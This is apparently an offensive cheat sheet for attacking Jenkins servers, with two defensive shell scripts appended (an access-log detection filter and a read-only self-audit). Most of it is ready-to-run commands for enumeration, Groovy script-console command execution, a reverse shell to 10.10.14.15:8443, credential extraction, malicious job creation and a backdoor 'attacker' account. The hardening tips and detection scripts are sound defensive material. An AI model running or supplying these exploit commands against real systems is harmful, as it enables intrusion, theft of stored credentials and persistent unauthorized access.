# abuse

### 1. Jenkins Version Detection

* **HTTP Headers:**

  ```bash
  curl -I http://target:8080/
  ```
* **Nmap Version Detection:**

  ```bash
  nmap -sV -p 8080 <target_ip>
  ```
* **Jenkins CLI Detection:**

  ```bash
  curl http://target:8080/jenkins/cli/ | grep -i "Jenkins CLI"
  ```

***

### 2. Jenkins Port Enumeration

* **Default HTTP:** 8080
* **Slave Communication:** 5000

  ```bash
  nmap -sV -p 8080,5000 <target_ip>
  ```

***

### 3. Jenkins CLI Enumeration

* **Help:**

  ```bash
  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ help
  ```
* **List Plugins:**

  ```bash
  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-plugins
  ```
* **List Jobs:**

  ```bash
  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-jobs
  ```

  * Enumerate jobs, plugins, users.

***

### 4. Jenkins Plugin Enumeration

* **List Installed Plugins:**

  ```bash
  curl http://target:8080/jenkins/pluginManager/
  ```

  * Plugins are a common source of vulnerabilities.
  * **Vulnerability Search:** Inspect plugin names, search for CVEs on NVD/Exploit-DB.
  * **Example:** Pipeline: Groovy plugin (CVE-2019-10352) allows arbitrary code execution.
  * **Exploitation Methods:** Research specific plugin CVEs and exploitation methods.

***

### 5. Jenkins Security Realm Enumeration

* **Check Authentication Methods:**

  ```bash
  curl http://target:8080/jenkins/configureSecurity/
  ```

  * Jenkins DB, LDAP, etc.

***

### 6. Jenkins API Enumeration

* **API Endpoints:**

  ```bash
  curl http://target:8080/jenkins/api/
  curl http://target:8080/jenkins/api/json
  ```
* **API Token Enumeration:**
  * Check for exposed tokens in API responses or configuration files.
  * Use API tokens for unauthorized access.
  * Enumerate API endpoints for sensitive data using tools like curl or Python's `requests` library.
* **API Endpoint Vulnerabilities:**
  * Test API endpoints for vulnerabilities (fuzzing, parameter manipulation).
  * Check for endpoints allowing command injection or file read.

***

### 7. Jenkins Access Control Enumeration

* **Access Control Settings:**

  ```bash
  curl http://target:8080/jenkins/configureSecurity/
  ```

***

### 8. Exploiting Jenkins Script Console

* **Remote Command Execution:**

  ```bash
  curl -X POST -u admin:password --data-urlencode "script=println('Exploit successful')" http://target:8080/jenkins/scriptText
  ```
* **Groovy Command Execution (Linux):**

  ```bash
  curl -X POST -d "script=println 'id'.execute().text" http://target:8080/jenkins/scriptText
  ```
* **Groovy Command Execution (Windows):**

  ```bash
  curl -X POST -d "script=def cmd = 'cmd.exe /c dir'.execute(); println cmd.text" http://target:8080/jenkins/scriptText
  ```
* **Reverse Shell via Groovy (Linux):**

  ```bash
  curl -X POST -d "script=r = Runtime.getRuntime(); p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]); p.waitFor()" http://target:8080/jenkins/scriptText
  nc -lvnp 8443
  ```
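From the defender's side, the script console, CLI and credential-store requests above leave a trace in the Jenkins HTTP access log. This added example (not code from the original page) is a small POSIX shell filter that flags such requests in NCSA combined-format access-log lines; the log lines are constructed samples, and the path patterns are taken from the endpoints listed on this page.

```shell
#!/bin/sh
# Flag sensitive Jenkins HTTP requests in NCSA combined access-log lines.
# Assumes the format Winstone's SimpleAccessLogger writes:
# host ident user [date] "METHOD path HTTP/x" status bytes "referer" "ua"

# Constructed sample log lines (not from a real instance).
sample_access_log() {
  cat <<'EOF'
10.0.0.5 - alice [12/May/2024:10:01:02 +0000] "GET /jenkins/job/build1/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2024:10:02:15 +0000] "POST /jenkins/scriptText HTTP/1.1" 200 41 "-" "curl/8.4.0"
10.0.0.9 - - [12/May/2024:10:02:20 +0000] "GET /jenkins/credentials/store/system/domain/_/ HTTP/1.1" 403 0 "-" "curl/8.4.0"
10.0.0.7 - bob [12/May/2024:10:03:00 +0000] "POST /jenkins/job/build1/build HTTP/1.1" 201 0 "-" "Mozilla/5.0"
10.0.0.7 - bob [12/May/2024:10:04:10 +0000] "POST /jenkins/createItem?name=exploit_job HTTP/1.1" 200 0 "-" "Jenkins CLI"
EOF
}

# Reads log lines on stdin and prints one ALERT line per request that
# touches the script console, the CLI, the credential store or admin config.
flag_sensitive_requests() {
  awk '
    { tag = "" }
    $7 ~ /\/(script|scriptText)([?]|$)/               { tag = "script-console" }
    $7 ~ /\/cli(\/|[?]|$)/                             { tag = "cli" }
    $7 ~ /\/credentials\/store\//                      { tag = "credential-store" }
    $7 ~ /\/(createItem|configureSecurity)(\/|[?]|$)/  { tag = "admin-config" }
    tag != "" {
      # $3 is the authenticated user; "-" means the request was anonymous.
      who = ($3 == "-") ? "ANONYMOUS" : $3
      printf "ALERT %s ip=%s user=%s %s %s status=%s\n", tag, $1, who, substr($6, 2), $7, $9
    }
  '
}

# Number of alerts raised on the constructed sample (3 of the 5 lines).
count_sample_alerts() {
  sample_access_log | flag_sensitive_requests | grep -c '^ALERT'
}

sample_access_log | flag_sensitive_requests
```

Denied attempts (the 403 on the credential store) are flagged as well, since a refused probe is still worth an analyst's attention.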

***

### 9. Exploiting Build Job Misconfigurations

* **Create Malicious Job:**

  ```bash
  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ create-job exploit_job < exploit.xml
  ```

***

### 10. Exploiting Pipeline Misconfigurations

* **Inject Malicious Groovy Script:**

  ```bash
  java -jar jenkins-cli.jar -s http://target:8080/jenkins/ build exploit_pipeline
  ```

***

### 11. Extracting Credentials from Jenkins

* **Extract Stored Credentials:**

  ```bash
  curl -u admin:password http://target:8080/jenkins/credentials/store/system/domain/_/
  ```

***

### 12. Persistence and Post-Exploitation

* **Create Backdoor User:**

  ```bash
  curl -X POST -u admin:password --data-urlencode "script=jenkins.model.Jenkins.instance.securityRealm.createAccount('attacker', 'password')" http://target:8080/jenkins/scriptText
  ```

***

### 13. Unauthenticated Exploits (Public Jenkins)

* **Check for Anonymous Access:**

  ```bash
  curl http://target:8080/jenkins/
  ```

***

### 14. Pipeline Script Injection (Groovy RCE)

```groovy
def cmd = "whoami".execute()
println cmd.text
```

***

### 15. Jenkins Slave Exploitation

* **Misconfigured Slave Nodes:**
  * Look for misconfigured slave nodes: insecure communication protocols, missing access control.
  * Exploit misconfigured slaves to gain access to the Jenkins master.

***

### 16. Exploiting Misconfigured Webhooks

* **Webhook-Triggered Jobs:**
  * Identify webhook-triggered jobs.

***

### 17. Jenkins SSRF & External Service Interaction

```groovy
def url = "http://internal-service.local:8080"
def conn = url.toURL().openConnection()
println conn.getInputStream().text
```

***

### 18. Jenkins Reverse Shell via Build Step Manipulation

* **Modify Job Build Steps:**
  * Modify job build steps for reverse shell.

***

### 19. Privilege Escalation via Misconfigured Agents

* **Elevated Privileges:**
  * If Jenkins agents run with elevated privileges, execute commands as a higher-privileged user.

***

### 20. Arbitrary File Read via Plugin Vulnerabilities

* **Vulnerable Plugins:**
  * Exploit vulnerable plugins like "Pipeline: Groovy" to read sensitive files.

***

### Additional Exploitation Techniques

* **21. CSRF Protection Bypass:**
  * Jenkins has CSRF protection, but misconfigurations may allow bypassing.
  * Common bypass methods: Referer header manipulation, token manipulation.
* **22. Authentication Bypass Details:**
  * Review known authentication bypass vulnerabilities and their exploits.
  * Check for anonymous access misconfigurations.
  * Path traversal, header manipulation, session hijacking, default credentials.
* **23. Jenkins Security Hardening:**
  * Keep Jenkins and plugins updated.
  * Restrict access to the script console.
  * Use strong authentication and RBAC.
  * Strong passwords, MFA, network segmentation, regular security audits, principle of least privilege.
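
The checks in sections 1, 6, 13 and 21 double as a self-audit for an operator hardening their own instance. This added example (not code from the original page) is a read-only POSIX shell script that reports version disclosure via the `X-Jenkins` header, anonymous readability of the endpoints named on this page, and whether the CSRF crumb issuer is enabled; the header text and status codes in its self-test are constructed, and `/crumbIssuer/api/json` is the one endpoint added beyond those on the page.

```shell
#!/bin/sh
# Read-only self-audit of a Jenkins instance: version disclosure, anonymous
# read access, script console reachability and CSRF (crumb) protection.
# Usage: sh jenkins_audit.sh http://jenkins.example.internal:8080/jenkins

# Extract the version Jenkins advertises in its X-Jenkins response header
# (stdin: raw response headers). Prints "not-disclosed" when absent.
version_from_headers() {
  tr -d '\r' | awk 'tolower($1) == "x-jenkins:" { v = $2 }
                    END { if (v == "") v = "not-disclosed"; print v }'
}

# Classify the HTTP status an unauthenticated GET of $1 returned ($2).
anon_verdict() {
  case "$2" in
    200)     echo "EXPOSED  $1 is readable without authentication" ;;
    302)     echo "ok       $1 redirected (usually to login); verify" ;;
    401|403) echo "ok       $1 requires authentication" ;;
    404)     echo "ok       $1 not present" ;;
    *)       echo "unknown  $1 returned status $2" ;;
  esac
}

# Crumb issuer: 200 means CSRF protection is on, 404 means it is disabled.
csrf_verdict() {
  case "$1" in
    200)     echo "ok       CSRF crumb issuer enabled" ;;
    404)     echo "WEAK     CSRF protection (crumb issuer) disabled" ;;
    401|403) echo "unknown  authenticate (-u user:token) to check CSRF" ;;
    *)       echo "unknown  crumb issuer returned status $1" ;;
  esac
}

# HTTP status of an unauthenticated GET of URL $1.
status_of() {
  curl -s -o /dev/null -w '%{http_code}' --max-time 10 "$1"
}

# $1 = Jenkins base URL, e.g. http://host:8080/jenkins
run_audit() {
  base="${1%/}"
  echo "version  $(curl -s -I --max-time 10 "$base/" | version_from_headers)"
  for ep in /api/json /script /credentials/store/system/domain/_/api/json; do
    anon_verdict "$ep" "$(status_of "$base$ep")"
  done
  csrf_verdict "$(status_of "$base/crumbIssuer/api/json")"
}

if [ $# -eq 1 ]; then run_audit "$1"; fi
```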
